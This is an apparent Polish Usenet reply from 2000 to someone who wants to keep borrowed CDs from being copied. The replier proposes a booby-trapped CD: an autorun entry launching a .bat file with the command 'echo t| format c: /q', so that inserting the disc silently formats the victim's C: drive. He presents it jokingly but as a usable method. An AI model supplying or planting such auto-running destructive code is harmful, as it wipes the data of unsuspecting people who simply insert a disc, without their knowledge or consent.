Re: Zabezpieczenie przy nagrywaniu

Autor: Johnny Navalony (wojtun_at_poczta.onet.pl)
Data: Fri 10 Mar 2000 - 02:05:42 MET

Kiedyśtam "Artur" <albinski_at_kki.net.pl> nabazgrał:

>Mam problem z ludzmi ktorzy pozyczaja plyty,przegrywaja je bez mojej wiedzy
>i puszczaja w obieg.Czy mozna zabezpieczyc tak plyte aby ktos mogl
>ewentualnie ja przejrzec ale nie skopiowac lub nie mogl jej wcale przejrzec
>bez mojej wiedzy.Prosze o informacje.

Mozesz zrobic takiego autoruna ktory po wlozeniu plytki bedzie
formatowal dysk. Jezeli ostrzezesz swojego qmpla i powiesz aby nie
uruhamial autorana to nic mu sie stanie he he he.

Piszes sobie jakis prosty programik, albo najlatwiej
robisz plik *.bat. Wpisujesz w nim echo t| format c: /q
i dopisujesz do autona uruhomienie bat'a gosciu z glowy.
Po wlozeniu plytki dysk sformatuje siee bez pytania.

Pozdrawiam i polecam